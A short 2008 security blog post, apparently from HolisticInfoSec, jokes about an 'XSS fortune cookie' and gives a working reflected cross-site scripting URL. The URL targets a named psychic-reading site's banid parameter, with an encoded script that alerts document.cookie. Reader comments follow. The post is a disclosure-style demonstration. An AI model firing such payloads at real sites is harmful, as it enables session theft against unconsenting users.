Tuesday, September 02, 2008

XSS fortune cookie

Forgive me in advance for an extremely bad joke, if you can even call it that, but I just can't help it.
Here's how to get an XSS fortune cookie:

1) Ask the mighty Google oracle who might be able to tell you your fortune.
http://www.google.com/search?hl=en&q=tell+my+fortune&btnG=Search&lr=lang_en

2) Select one of the sponsored links; in this case I chose SpritualExperts.com.

3) Pick a variable. I settled for banid.

4) Ask it if it has a cookie for you.
http://www.spiritualexperts.com/psychic_reading/psychic_reading.asp?banid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E

Voila...an XSS fortune cookie. Sorry. Really, I am.

The webmaster has been advised...play nice.

Screenshot for after they fix the issue.



del.icio.us | digg
at
Labels: ,

4 comments:

Anonymous said...

Hopefully your day job will keep you employed long enough that you won't need to fall back on stand up comedy.

5:36 AM
Kevin Lam (Impacta LLC) said...

For sure you're working too hard at your day job to have to resort to this! :) Funny stuff man!

Kevin
Impacta LLC

12:29 PM
Rafal Los said...

Dude... you need a vacation.

2:34 PM
Sultan said...
This comment has been removed by a blog administrator.
10:05 AM

Post a Comment

Subscribe to: Post Comments (Atom)

Moving blog to HolisticInfoSec.io

toolsmith and HolisticInfoSec have moved. I've decided to consolidate all content on one platform, namely an R markdown blogdown sit...